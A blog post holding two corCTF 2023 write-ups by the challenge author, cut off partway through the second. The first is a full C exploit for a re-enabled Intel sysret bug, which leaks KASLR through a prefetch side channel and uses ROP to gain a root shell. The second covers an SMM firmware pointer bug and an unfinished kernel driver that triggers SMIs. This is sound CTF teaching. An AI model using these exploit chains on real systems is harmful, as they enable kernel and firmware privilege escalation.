Will's Root: August 2023

Wednesday, August 2, 2023

corCTF 2023 sysruption - Exploiting Sysret on Linux in 2023

Sysruption was a hardware, micro-architectural, and kernel exploitation challenge I wrote for corCTF 2023. It is my personal favorite challenge for this CTF as it tied closely into my first µarch CVE (EntryBleed), showcased the applicability of a µarch attack in a realistic exploit, and was built on the premise of a real hardware bug.

This bug has re-appeared multiple times throughout the years, manifesting first in CVE-2006-0744. It subsequently returns to haunt systems in CVE-2012-0217, affecting FreeBSD, Xen hypervisor, Solaris, Windows 7, and many other operating systems - people have documented their exploits for different OSes such as this one for FreeBSD and this one for Xen hypervisor. To my knowledge, the last publicly known time this bug came back again was in CVE-2014-4699 on Linux. Since 2014 was before the era of all the modern kernel mitigations like KASLR and the previous writeup targeted it on a system without SMAP and with a writeable IDTs, the premise of this challenge became exploiting this on a modern Linux system with standard hardening features. Before I continue, a huge shout out must go to zolutal for first-blooding this challenge - he has a really amazing writeup for it!

I first heard about this bug in MIT’s 6.888 Secure Hardware Design Course, which also taught me about the prefetch attack that inspired EntryBleed through their lab assignments (along with other cool labs like Spectre, Rowhammer, L2 prime and probe, and RISC-V CPU fuzzing). So what exactly is this sysret bug?

According to Intel, this is not a bug (but a feature?) - it’s the software developer’s fault for not carefully reading the documentation. To quote the SDM:

SYSRET is a companion instruction to the SYSCALL instruction. It returns from an OS system-call handler to user code at privilege level 3. It does so by loading RIP from RCX and loading RFLAGS from R11. With a 64-bit operand size, SYSRET remains in 64-bit mode; otherwise, it enters compatibility mode and only the low 32 bits of the registers are loaded.

As the documentation then proceeds to state, if the RCX address is non-canonical, then a general protection fault happens in ring 0, so the exception handler in ring 0 runs. In contrast, AMD has the fault happen in userland (which would then crash the process in ring 3). By having a general protection fault happen in a syscall return sequence where all the userland registers have been restored (including the stack pointer) at ring 0, the exception handler will happily start saving the current CPU state with the restored stack pointer, effectively giving us an arbitrary write vulnerability using the pre-exception register state.

To bring back this bug, I made the following patch, on kernel 6.3.4.

--- orig_entry_64.S +++ linux-6.3.4/arch/x86/entry/entry_64.S @@ -150,13 +150,13 @@ ALTERNATIVE "shl $(64 - 48), %rcx; sar $(64 - 48), %rcx", \ "shl $(64 - 57), %rcx; sar $(64 - 57), %rcx", X86_FEATURE_LA57 #else - shl $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx - sar $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx + # shl $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx + # sar $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx #endif /* If this changed %rcx, it was not canonical */ - cmpq %rcx, %r11 - jne swapgs_restore_regs_and_return_to_usermode + # cmpq %rcx, %r11 + # jne swapgs_restore_regs_and_return_to_usermode cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */ jne swapgs_restore_regs_and_return_to_usermode

This effectively reverts a precise check for non-canonical addresses introduced by this patch.

How exactly do we trigger this bug? The 2014 CVE PoC is still applicable in this case, and I borrowed that with a few slight modifications. The PoC basically chained ptrace and forks in a way to modify the registers such that the grandchild task attempts to return to a non-canonical address upon sysret. A canonical address is simply one where bit 63 to whatever the highest bit supported by the chipset is all 1s or 0s (hence the shl and sar usage in the original check). I was actually surprised that this still worked, as Linux introduced a patch to force irets for this chain of ptrace usage. Fortunately for us, this was actually removed in a subsequent patch once the stronger check before sysret was introduced.

Unlike the 2014 PoC, the Linux kernel now comes with KASLR. This is where the second main component of my challenge comes in - a micro-architectural (or µarch) attack. In my opinion, µarch attacks are often overlooked in developing exploits when talking to some people working in the VR industry. Since Spectre and Meltdown, a flurry of new research for similar attacks started in academia, many of which are really fascinating attacks and reveal just how crazy modern hardware is. While some worked pretty well and would definitely be applicable in the real world, there are also many that really only work in pristine noiseless lab conditions on specific system configurations, topped off with an extremely low side-channel leakage rates. Perhaps it’s these latter attacks that cause real world exploit developers to often shrug off this vector of attack.

As documented in my EntryBleed attack against KPTI, and ProjectZero’s writeup for CVE-2022-42703, the prefetch µarch attack from Daniel Gruss is one of those attacks that are extremely fast and accurate at leaking something sensitive (in this case, KASLR). Please refer to those links for more information regarding how the attack works.

Note that the kernel is running without KPTI so you can also reliably leak other sections of kernel memory asides from text and data (a limitation of EntryBleed). This isn’t me making the challenge easier though - when the Linux kernel detects that a CPU is hardware mitigated against Meltdown, KPTI is not enabled by default. This is certainly a strange choice (though probably for the sake of performance), as Meltdown is not the only type of µarch attack that can break KASLR based on the shared page-table scheme. Regardless, this is perfect for this challenge as I ran it on a dedicated Cascade Lake server, so KPTI would be disabled by default.

The exploitation strategy from here should be to use a prefetch attack to leak the kernel base address, and then choose a target to overwrite in writeable kernel image sections. But an immediate issue that arises is that when executing sysret, the kernel is now using a userland GS register due to the preceeding swapgs instruction. The GS register is vital to per cpu data referencing in the kernel - in fact, when the GPF executes with an invalid gs register, it repeatedly page faults until the system gives up and panics. This is because there are attempts made to access memory offsets from the GS register in these handlers. The exception handler in error_entry will only manually switch to a kernel gs if the exception source was from userland.

Like Zolutal, I first attempted to control the userland GS register with prctl, but the kernel checks that it is in userland address range. There also really isn’t way for me to find something in kernel data or text to act as a fake gsbase either. Luckily, x86_64 has had the fsgsbase extension for a while now, which “allows applications to directly write to the FS and GS segment registers.”

Now we need to leak gsbase. It’s in physmap at a constant offset (I believe that the first percpu chunk always piggy backs off of the linear direct physical mapping according to comments, so the offset would be RAM dependent?). In my exploit, I leaked physmap base by side-channeling the possible range of physmap addresses according to Linux documentation, and applying a mask to the first leaked address before adding the correct offset to gsbase. This approximation has never failed for me yet.

Looking back on the output of my side-channel, I didn’t even need to leak physmap to get cpu 0’s gsbase. As this address comes after the linear direct physical mapping and is frequently used, it would likely always be the last address that falls into the physmap range to be side-channeled out of the TLB via a prefetch attack as this is a one-core system. Of course this would mean that the increment for virtual addresses in the side-channel have to align with this gsbase address, which mine did.

With all the leaks now, I presumed that exploitation would have been trivial, and first went for common targets like modprobe_path. Unfortunately, the exception handler seemed to really trash up the stack, writing around 0x860 bytes of data based on my debugging when I had it target the CEA region. This causes a lot of important things to be overwritten, and leaves the kernel in a highly unstable state that usually results in a panic quite quickly. Zolutal actually managed to get this working, and he discusses how he achieves this in his writeup.

What ended up working for me were function pointers in tcp_prot, a technique borrowed from an exploit for CVE-2022-29582. setsockopt then provided me enough register control to stack pivot to another ROP chain (which I wrote ahead of time into an offset from kernel gsbase in a previous trigger of the sysret bug) and escalate privileges to root.

Originally, I enabled oops=panic and aimed to have players disable that setting in the first iteration of the sysret bug to continue exploitation as the general protection fault would lead to an oops. I wasn’t able to achieve it due to how the GPF handler trashed the stack, but if Zolutal managed to get modprobe_path overwrite working, then this might be feasible too.

The following is my exploit and its successful exploitation of the challenge:

#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdbool.h> #include <sched.h> #include <fcntl.h> #include <assert.h> #include <unistd.h> #include <errno.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/syscall.h> #include <sys/user.h> #include <sys/mman.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> void pfail(char *str) { perror(str); _exit(-1); } int assign_to_core(int core_id) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(core_id, &mask); if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) pfail("sched_setaffinity"); } uint64_t sidechannel(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } // #define ITERATIONS 1 // this needs to be fine tuned to work best for the gsbase and kbase leak #define THRESHOLD 50 // 8 gb more than enough #define POTENTIAL_END (8ull << 30) int threshold = THRESHOLD; uint64_t prefetch_leak(uint64_t scan_start, uint64_t scan_end, uint64_t step) { uint64_t size = (scan_end - scan_start) / step; uint64_t *data = calloc(size, sizeof(uint64_t)); uint64_t min = ~0, addr = ~0, potential_end = 0; do { bool set = false; for (uint64_t idx = 0; idx < size; idx++) { uint64_t test_addr = scan_start + idx * step; if (potential_end && test_addr > potential_end) break; syscall(104); uint64_t time = sidechannel(test_addr); if (time < threshold) { printf("%llx %ld\n", (scan_start + idx * step), time); data[idx]++; if (!potential_end) potential_end = test_addr + POTENTIAL_END; } } for (int i = 0; i < size; i++) { if (!set && data[i] >= 1) { addr = scan_start + i * step; set = true; } } } while (addr == ~0); free(data); return addr; } #define KERNEL_STEP 0x200000ull #define KERNEL_BOTTOM 0xffffffff80000000ull #define KERNEL_TOP 0xffffffffc0000000ull #define PHYSMAP_STEP 0x200000ull #define PHYSMAP_BOTTOM 0xffff888000000000ull #define PHYSMAP_TOP 0xffffc88000000000ull uint64_t kbase = 0xffffffff81000000ull; uint64_t curr_cpu_gsbase = 0xffff88813bc00000ull; uint64_t trampoline = 0xffffffff81a00ee1ull - 0xffffffff81000000ull; uint64_t pop_rsp = 0xffffffff811083d0ull - 0xffffffff81000000ull; uint64_t pop_rsp_rsi = 0xffffffff81514860ull - 0xffffffff81000000ull; uint64_t push_rcx_jmp_ptr_rcx = 0xffffffff8136b694ull - 0xffffffff81000000ull; uint64_t pop_rsi_rdi_rbp = 0xffffffff81f006d9ull - 0xffffffff81000000ull; uint64_t pop_rdi_rcx = 0xffffffff81cda0b8ull - 0xffffffff81000000ull; uint64_t pop_rdi = 0xffffffff811d63f3ull - 0xffffffff81000000ull; uint64_t tcp_prot = 0xffffffff82160180ull - 0xffffffff81000000ull; uint64_t commit_creds = 0xffffffff8109b810ull - 0xffffffff81000000ull; uint64_t init_cred = 0xffffffff8203ade0ull - 0xffffffff81000000ull; void nopper(struct user_regs_struct *regs) {} void overwrite_ioctl(struct user_regs_struct *regs) { regs->r9 = push_rcx_jmp_ptr_rcx; } void *stack_addr = NULL; void win() { int fd = open("/root/flag.txt", O_RDONLY); char buf[300]; int n = read(fd, buf, sizeof(buf)); write(1, buf, n); puts("r000000000t"); system("/bin/sh"); } __attribute__((naked)) void escaped_from_hell() { asm volatile( ".intel_syntax noprefix;" "lea rsp, qword ptr [rip + stack_addr];" "mov rsp, qword ptr [rsp];" "mov rax, 0xff;" "not rax;" "and rsp, rax;" "push rax;" "call win;" ".att_syntax;" :::); } void trigger_sysret_bug(uint64_t stack, void (*setup_regs)(struct user_regs_struct *reg)) { struct user_regs_struct regs; int status; pid_t chld; if ((chld = fork()) < 0) { perror("fork"); exit(1); } if (chld == 0) { if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) { perror("PTRACE_TRACEME"); exit(1); } raise(SIGSTOP); // if ptrace set regs too many at once, simply just fails and never triggers sysret bug // not sure why this is the case, so set registers before ptrace asm volatile( ".intel_syntax noprefix;" "mov r14, qword ptr [pop_rsp_rsi];" "mov r13, qword ptr [pop_rdi];" "mov r12, qword ptr [init_cred];" "mov rbp, qword ptr [commit_creds];" "mov rbx, qword ptr [trampoline];" "mov r11, 0xdeadbeef;" "mov r10, 0xbaadf00d;" "lea r9, qword ptr [rip + escaped_from_hell];" "mov r8, 0x33;" // no need for stack, we can restore in naked function in asm, otherwise interfere with rax "mov rdx, 0x2b;" "mov rax, 57;" "syscall;" "ud2;" ".att_syntax;":::); } waitpid(chld, &status, 0); ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK); ptrace(PTRACE_CONT, chld, 0, 0); waitpid(chld, &status, 0); ptrace(PTRACE_GETREGS, chld, NULL, &regs); regs.rcx = 0x8fffffffffff1337; regs.rip = 0x8fffffffffff1337; regs.rsp = stack; setup_regs(&regs); ptrace(PTRACE_SETREGS, chld, NULL, &regs); ptrace(PTRACE_CONT, chld, 0, 0); ptrace(PTRACE_DETACH, chld, 0, 0); exit(0); } int main(int argc, char **argv) { assign_to_core(0); int fd = socket(AF_INET, SOCK_STREAM, 0); if (argc == 2) threshold = atoi(argv[1]); // current threshold causes it to leak etext uint64_t kbase = prefetch_leak(KERNEL_BOTTOM, KERNEL_TOP, KERNEL_STEP) - 0xc00000; uint64_t curr_cpu_gsbase = (prefetch_leak(PHYSMAP_BOTTOM, PHYSMAP_TOP, PHYSMAP_STEP) & ~((1ull<<30) - 1)) - 0x100000000 + 0x13bc00000; uint64_t evil_stack = curr_cpu_gsbase + 0x860; printf("kbase: 0x%lx\n", kbase); printf("current cpu gsbase: 0x%lx\n", curr_cpu_gsbase); stack_addr = &fd; trampoline += kbase; pop_rsp += kbase; pop_rsp_rsi += kbase; push_rcx_jmp_ptr_rcx += kbase; pop_rsi_rdi_rbp += kbase; pop_rdi_rcx += kbase; pop_rdi += kbase; tcp_prot += kbase; commit_creds += kbase; init_cred += kbase; printf("stack pivot: 0x%lx\n", push_rcx_jmp_ptr_rcx); asm volatile( ".intel_syntax noprefix;" "mov rax, %0;" "wrgsbase rax;" ".att_syntax;"::"r"(curr_cpu_gsbase):"rax"); puts("calling wrgsbase"); puts("writing rop chain into current cpu gs base"); // write rop chain to gs base first if (fork() == 0) trigger_sysret_bug(evil_stack, &nopper); wait(NULL); sleep(1); evil_stack = tcp_prot + 0xb8; // overwrite ioctl in tcp proto puts("overwriting tcp_prot func pointers"); if (fork() == 0) trigger_sysret_bug(evil_stack, &overwrite_ioctl); wait(NULL); sleep(1); getchar(); // target setsockopt func ptr puts("triggering ROP"); setsockopt(fd, SOL_TCP, TCP_ULP, curr_cpu_gsbase + 0x7c0, 0x1337); puts("hi"); }

One interesting thing noticeable in the exploit is my adjusted strategy for prefetching. In my original EntryBleed PoC, I used simple averages. After doing a lot more micro-architectural attacks in the past year, I believe scoring leak candidates through a threshold system is a much better strategy and less susceptible to extreme outliers that would skew averaging. This threshold would be different across different CPUs, but would not be difficult to enumerate. Sometimes, the leak in my exploit is wrong (especially for kernel base), but I hypothesize that the accuracy could be improved if I performed a ton of memory accesses beforehand to help flush the TLB a bit more.

This concludes my writeups for corCTF 2023! Feel free to ask any questions about this or point out any mistakes. I hope people had a lot of fun with sysruption, especially as it combined a hardware quirk, a µarch attack, and a kernel exploit in one challenge as the description mentioned 😉. Congrats once again to Zolutal for the first blood, and to sampriti and team Balsn for second and third bloods, and thanks again to 6.888 for inspiring the components for this challenge!

corCTF 2023 smm-diary: Ropping in Ring -2

smm-diary was a medium difficulty pwnable challenge I wrote this year for corCTF 2023. I spent some time in the past year playing around with System Management Mode and reading up on binarly.io SMM CVEs, and thought it could make for a unique challenge to get players familiar with exploiting something new. Before continuing, I would like to give a shoutout to zhuyifei1999 for his CowSay series in UIUCTF 2022 that got me into SMM and MeBeim for his writeups on CowSay - funnily enough, these were the very two people who took first and second blood on my SMM challenge in corCTF this year.

To start off, we were given the following QEMU run script:

#!/bin/sh ./qemu-system-x86_64 \ -m 4096M \ -smp 1 \ -kernel "./bzImage" \ -append "console=ttyS0 panic=-1 ignore_loglevel pti=on" \ -netdev user,id=net \ -device e1000,netdev=net \ -display none \ -vga none \ -serial stdio \ -monitor /dev/null \ -machine q35,smm=on,accel=tcg \ -cpu max \ -initrd "./initramfs.cpio.gz" \ -global driver=cfi.pflash01,property=secure,value=on \ -drive if=pflash,format=raw,unit=0,file=./FV/OVMF_CODE.fd,readonly=on \ -drive if=pflash,format=raw,unit=1,file=./FV/OVMF_VARS.fd,readonly=on \ -global ICH9-LPC.disable_s3=1 \ -debugcon file:/dev/null \ -global isa-debugcon.iobase=0x402 \ -no-reboot

We were also given the following OVMF EDK2 patch on commit 16779ede2d366bfc6b702e817356ccf43425bcc8 (of course the flag was replaced with a dummy test flag in the distributed patch):

diff --git a/OvmfPkg/Corctf/Corctf.c b/OvmfPkg/Corctf/Corctf.c new file mode 100644 index 0000000..4122dbc --- /dev/null +++ b/OvmfPkg/Corctf/Corctf.c @@ -0,0 +1,141 @@ +#include <Uefi.h> +#include <Library/UefiLib.h> +#include <Library/BaseLib.h> +#include <Library/BaseMemoryLib.h> +#include <Library/DebugLib.h> +#include <Library/PcdLib.h> +#include <Library/SmmServicesTableLib.h> + +#include "Corctf.h" + +const CHAR8 *Flag = "corctf{uNch3CKeD_c0Mm_BufF3r:(}"; + +typedef struct +{ + UINT8 Note[16]; +}DIARY_NOTE; + +#define NUM_PAGES 20 + +DIARY_NOTE Book[NUM_PAGES]; + +#define ADD_NOTE 0x1337 +#define GET_NOTE 0x1338 +#define DUMP_NOTES 0x31337 + +typedef struct +{ + UINT32 Cmd; + UINT32 Idx; + union TRANSFER_DATA + { + DIARY_NOTE Note; + UINT8 *Dest; + } Data; +}COMM_DATA; + +VOID +TransferNote ( + IN DIARY_NOTE *Note, + IN UINT32 Idx, + IN BOOLEAN In + ) +{ + if (In) + { + CopyMem(&Book[Idx], Note, sizeof(DIARY_NOTE)); + } + else + { + CopyMem(Note, &Book[Idx], sizeof(DIARY_NOTE)); + } +} + +VOID +DumpNotes ( + IN UINT8 *Dest + ) +{ + CopyMem(Dest, &Book, sizeof(Book)); +} + +EFI_STATUS +EFIAPI +CorctfSmmHandler ( + IN EFI_HANDLE DispatchHandle, + IN CONST VOID *Context OPTIONAL, + IN OUT VOID *CommBuffer OPTIONAL, + IN OUT UINTN *CommBufferSize OPTIONAL + ) +{ + COMM_DATA *CommData = (COMM_DATA *)CommBuffer; + + if (*CommBufferSize != sizeof(COMM_DATA)) + { + DEBUG((DEBUG_INFO, "Invalid size passed to %a\n", __FUNCTION__)); + DEBUG((DEBUG_INFO, "Expected Size: 0x%lx, got 0x%lx\n", sizeof(COMM_DATA), *CommBufferSize)); + goto Failure; + } + + if ((CommData->Cmd == ADD_NOTE || CommData->Cmd == GET_NOTE) && CommData->Idx >= NUM_PAGES) + { + DEBUG((DEBUG_INFO, "Invalid idx passed to %a\n", __FUNCTION__)); + goto Failure; + } + + switch (CommData->Cmd) + { + case ADD_NOTE: + TransferNote(&(CommData->Data.Note), CommData->Idx, TRUE); + break; + case GET_NOTE: + TransferNote(&(CommData->Data.Note), CommData->Idx, FALSE); + break; + case DUMP_NOTES: + DumpNotes(CommData->Data.Dest); + break; + default: + DEBUG((DEBUG_INFO, "Invalid cmd passed to %a, got 0x%lx\n", __FUNCTION__, CommData->Cmd)); + goto Failure; + } + + return EFI_SUCCESS; + + Failure: + *CommBufferSize = -1; + return EFI_SUCCESS; +} + +EFI_STATUS +EFIAPI +CorctfSmmInit ( + IN EFI_HANDLE ImageHandle, + IN EFI_SYSTEM_TABLE* SystemTable + ) +{ + EFI_STATUS Status; + EFI_HANDLE DispatchHandle; + + ASSERT (FeaturePcdGet (PcdSmmSmramRequire)); + DEBUG ((DEBUG_INFO, "Corctf Diary Note Handler initiailizing\n")); + Status = gSmst->SmiHandlerRegister ( + CorctfSmmHandler, + &gEfiSmmCorctfProtocolGuid, + &DispatchHandle + ); + + if (EFI_ERROR (Status)) + { + DEBUG ((DEBUG_ERROR, "%a: SmiHandlerRegister(): %r\n", + __FUNCTION__, Status)); + } + else + { + DEBUG ((DEBUG_INFO, "Corctf SMM Diary Note handler installed successfully!\n")); + DEBUG ((DEBUG_INFO, "Unlike heap notes, storing your notes in SMM will give you true secrecy!\n", 0)); + DEBUG ((DEBUG_INFO, "This place is so secretive that we even hid a flag in here!\n" + "Just to tease you a bit, the first few characters are: %.6a\n", Flag)); + } + + return Status; +} \ No newline at end of file diff --git a/OvmfPkg/Corctf/Corctf.h b/OvmfPkg/Corctf/Corctf.h new file mode 100644 index 0000000..5f57570 --- /dev/null +++ b/OvmfPkg/Corctf/Corctf.h @@ -0,0 +1,7 @@ +#include <Uefi.h> + +// b888a84d-2888-480e-9583-813725fd398b +#define EFI_CORCTF_SMM_PROTOCOL_GUID \ + { 0xb888a84d, 0x3888, 0x480e, { 0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b } } + +extern EFI_GUID gEfiSmmCorctfProtocolGuid; \ No newline at end of file diff --git a/OvmfPkg/Corctf/Corctf.inf b/OvmfPkg/Corctf/Corctf.inf new file mode 100644 index 0000000..f5b0e72 --- /dev/null +++ b/OvmfPkg/Corctf/Corctf.inf @@ -0,0 +1,30 @@ +[Defines] + INF_VERSION = 1.29 + BASE_NAME = CorCtfSmm + FILE_GUID = 6217a808-f2d4-4c7b-a50e-7f8803b8d316 + MODULE_TYPE = DXE_SMM_DRIVER + ENTRY_POINT = CorctfSmmInit + PI_SPECIFICATION_VERSION = 0x00010046 + +[sources] + Corctf.h + Corctf.c + +[Packages] + MdePkg/MdePkg.dec + OvmfPkg/OvmfPkg.dec + +[LibraryClasses] + UefiDriverEntryPoint + UefiLib + PcdLib + SmmServicesTableLib + +[Protocols] + gEfiSmmCorctfProtocolGuid + +[FeaturePcd] + gUefiOvmfPkgTokenSpaceGuid.PcdSmmSmramRequire + +[Depex] + TRUE \ No newline at end of file diff --git a/OvmfPkg/OvmfPkg.dec b/OvmfPkg/OvmfPkg.dec index 8c20480..acdb900 100644 --- a/OvmfPkg/OvmfPkg.dec +++ b/OvmfPkg/OvmfPkg.dec @@ -172,6 +172,7 @@ gQemuAcpiTableNotifyProtocolGuid = {0x928939b2, 0x4235, 0x462f, {0x95, 0x80, 0xf6, 0xa2, 0xb2, 0xc2, 0x1a, 0x4f}} gEfiMpInitLibMpDepProtocolGuid = {0xbb00a5ca, 0x8ce, 0x462f, {0xa5, 0x37, 0x43, 0xc7, 0x4a, 0x82, 0x5c, 0xa4}} gEfiMpInitLibUpDepProtocolGuid = {0xa9e7cef1, 0x5682, 0x42cc, {0xb1, 0x23, 0x99, 0x30, 0x97, 0x3f, 0x4a, 0x9f}} + gEfiSmmCorctfProtocolGuid = {0xb888a84d, 0x3888, 0x480e, {0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b}} [PcdsFixedAtBuild] gUefiOvmfPkgTokenSpaceGuid.PcdOvmfPeiMemFvBase|0x0|UINT32|0 diff --git a/OvmfPkg/OvmfPkgX64.dsc b/OvmfPkg/OvmfPkgX64.dsc index 1448f92..fe4e828 100644 --- a/OvmfPkg/OvmfPkgX64.dsc +++ b/OvmfPkg/OvmfPkgX64.dsc @@ -697,7 +697,9 @@ ################################################################################ [Components] OvmfPkg/ResetVector/ResetVector.inf - +!if $(SMM_REQUIRE) == TRUE + OvmfPkg/Corctf/Corctf.inf +!endif # # SEC Phase modules # diff --git a/OvmfPkg/OvmfPkgX64.fdf b/OvmfPkg/OvmfPkgX64.fdf index 438806f..55e1b9e 100644 --- a/OvmfPkg/OvmfPkgX64.fdf +++ b/OvmfPkg/OvmfPkgX64.fdf @@ -380,7 +380,7 @@ INF OvmfPkg/CpuHotplugSmm/CpuHotplugSmm.inf INF UefiCpuPkg/CpuIo2Smm/CpuIo2Smm.inf INF MdeModulePkg/Universal/LockBox/SmmLockBox/SmmLockBox.inf INF UefiCpuPkg/PiSmmCpuDxeSmm/PiSmmCpuDxeSmm.inf - +INF OvmfPkg/Corctf/Corctf.inf # # Variable driver stack (SMM) #

Before discussing the bug, it is important to give a high level overview of SMM - I learned a lot of what I know from this slideshow and this post. SMM (System Management Mode) is the second most privileged ring on x86_64 (only ring -3 is more privileged). Its intended use case is often for vital or sensitive firmware that should run uninterrupted at high privileges. When a system enters SMM, all cores enter SMM to prevent any potential race conditions in SMT systems… and one wonders why too many SMM transitions are known for causing performance degradation.

One common way to trigger entry is to rely on a software smi (system management interrupt) by writing to IO port 0xb2. The processor then executes the SMM entry point, which is located at an offset from the SMBASE register, and saves the current processor state for it at a certain offset from SMBASE to restore later when leaving SMM with the rsm instruction. The code here starts off by executing in real mode (so physical addresses!) but identity paging is often set up, usually as read write execute (although not in the case of current upstream OVMF).

Generally, the execution and data of SMM handlers should be constrainted to be within SMRAM - x86_64 has a SMRAMC register that provides D_OPEN bit, which when unset hides SMRAM from non-SMM contexts, and the D_LCK bit to prevent tampering with the previous setting (this bit can only be cleared with a system reset). Modern chips also have a TSEG region, which you can just think of as extra SMRAM.

There is plenty more to SMM and possible security pitfalls, but that is beyond the scope of this writeup. If you are curious to see some of the other links I read up on, I linked them at the end of this writeup.

The bug in the above patch is a classic SMM firmware bug, in which a pointer passed in via the communication buffer for result output isn’t checked to be outside of SMRAM. Effectively, this just becomes an arbitrary write bug. Since SMM in OVMF (and I presume in almost all UEFI firmware) does not have ASLR, we can just target the stack and ROP in ring -2. The flag by itself is located in SMRAM, so it would only be accessible first from ring -2.

A custom QEMU build was also provided from commit f7f686b61cf7ee142c9264d2e04ac2c6a96d37f8. Standard distro QEMU builds (which were usualy of older versions) seemed to have trouble working with SMM, at least when interacting with them from ring 0 (and in general, there seems to be some quirks with QEMU SMM that differs from real hardware). KVM was also disabled as attempting to debug with a gdb remote server caused both gdb and the QEMU instance to crash for me.

The user was booted into an Ubuntu linux-hwe-5.15-headers-5.15.0-73 kernel as the root user. When checking the memory tree in QEMU monitor mode with info mtree, we see SMRAM relevant regions at 0000000000030000-000000000004ffff 00000000000a0000-00000000000bffff and 000000007f000000-000000007fffffff (the latter of which is denoted TSEG and where most of the OVMF SMM modules seem to be located). Both the first and third region are filled with 0xffs when accessed from non SMM mode, while the middle one is all nulls (which I believe is treated as relevant for the VGA buffer when not in SMM mode). So even as root, the player has no way in retrieving the flag embedded in the buggy SMM module.

The bug by itself is quite simple to exploit, and I also provided the player with all the debug builds of the OVMF firmware’s internal module binaries. Any experienced pwner can easily find ROP gadgets with those to write out the flag from SMRAM to somewhere accessible for ring 0. The main question now is how can one communicate with this specific corctf SMM module from kernel, given its GUID in the diff file above?

This took a while for me to figure out, but binarly.io repeatedly mentioned a tool known as ChipSec when sending payloads from ring 0 to ring -2. I took a look at how this functionality worked, and it seemed that it just scanned memory to look for the headers of the gSmmCorePrivate struct before replicating the process of how a UEFI DXE service would trigger and communicate with a specific SMM handler - it does this by writing the associated CommBuffer pointer with the GUID along with some additional metadata in regards to sizes, before writing 0 to IO port 0xB2 and 0xB3 to trigger the software SMI. Note that OVMF checks to ensure that the CommBuffer is from a specific region of memory in addition to it not overlapping with SMRAM here.

By default, the location of gSmmCorePrivate can’t be reached from kernel even when reading from physmap, as BIOS marks it as reserved during boot based on dmesg logs. But this can be easily solved with the help of ioremap to map in the physical address.

With all the above information, we can now write an exploit! I wrote the following driver to exploit the SMM handler:

#include <asm/msr.h> #include <asm/io.h> #include <linux/kernel.h> #include <linux/module.h> #include <linux/mm.h> #include <linux/pgtable.h> #include <linux/slab.h> MODULE_AUTHOR("FizzBuzz101"); MODULE_DESCRIPTION("Pwning SMM"); MODULE_LICENSE("GPL"); void log_smis(void) { uint64_t val = 0; rdmsrl(MSR_SMI_COUNT, val); printk(KERN_INFO "SMI_COUNT: 0x%llx\n", val); } void trigger_smi(void) { log_smis(); asm volatile( ".intel_syntax noprefix;" "xor eax, eax;" "out 0xb3, eax;" "out 0xb2, eax;" ".att_syntax;" :::"rax"); log_smis(); } typedef struct { uint32_t Data1; uint16_t Data2; uint16_t Data3; uint8_t Data4[8]; } EFI_GUID; #define START_MAP 0x000000007e8ef000ull #define END_MAP 0x000000007eaef000ull #define SMMC_PHYS_ADDR 0x000000007EACF380ull #define COMM_BUFFER 0x7E9EF000ull // [ 0.000000] BIOS-e820: [mem 0x000000007e8ef000-0x000000007eb6efff] reserved void *reserved; void *smmc; void *comm_buffer; EFI_GUID target_smi_guid = {0xb888a84d, 0x3888, 0x480e, {0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b}}; void map_reserved(void) { // locally, smcc is at 0x000000007EACF380 reserved = ioremap(SMMC_PHYS_ADDR & ~(0xfffull), PAGE_SIZE); smmc = reserved + (SMMC_PHYS_ADDR & 0xfffull); printk(KERN_INFO "mapped in virtual address of reserved UEFI region: 0x%lx\n", (uint64_t)reserved); printk(KERN_INFO "new SMMC virtual address: 0x%lx\n", (uint64_t)smmc); comm_buffer = ioremap(COMM_BUFFER, PAGE_SIZE); printk(KERN_INFO "mapped in virtual address of UEFI Comm Buffer: 0x%lx\n", (uint64_t)comm_buffer); } void unmap_reserved(void) { iounmap(reserved); iounmap(comm_buffer); } #define PAYLOAD_MAX_SZ 0x100 void trigger_vuln_smi(void *data, uint64_t size) { void *commbuffer_off = smmc + 56; void *commbuffersz_off = smmc + 64; uint64_t final_sz = sizeof(target_smi_guid) + sizeof(size) + size; memcpy(comm_buffer, &target_smi_guid, sizeof(target_smi_guid)); memcpy(comm_buffer + sizeof(target_smi_guid) + sizeof(size), data, size); writeq(COMM_BUFFER, commbuffer_off); writeq(final_sz, commbuffersz_off); trigger_smi(); } #define ADD_NOTE 0x1337 #define GET_NOTE 0x1338 #define DUMP_NOTES 0x31337 typedef __uint128_t DIARY_NOTE; typedef uint32_t UINT32; typedef uint8_t UINT8; typedef struct { UINT32 Cmd; UINT32 Idx; union TRANSFER_DATA { DIARY_NOTE Note; UINT8 *Dest; } Data; }__attribute__((packed)) COMM_DATA; void send_key(__uint128_t note, uint32_t idx) { COMM_DATA data = {0}; data.Cmd = ADD_NOTE; data.Idx = idx; data.Data.Note = note; trigger_vuln_smi(&data, sizeof(data)); } void send_gadget(uint64_t gadget1, uint64_t gadget2, uint32_t idx) { __uint128_t note = gadget1 | ((__uint128_t)(gadget2) << 64); send_key(note, idx); } void dump_all_notes(phys_addr_t addr) { COMM_DATA data = {0}; data.Cmd = DUMP_NOTES; data.Data.Dest = addr; trigger_vuln_smi(&data, sizeof(data)); } // get SMM Driver load addresses from debug log, and break to get return address #define PiSmmCpuDxeSmmBase 0x0007FFBF000ull #define PiSmmCoreBase 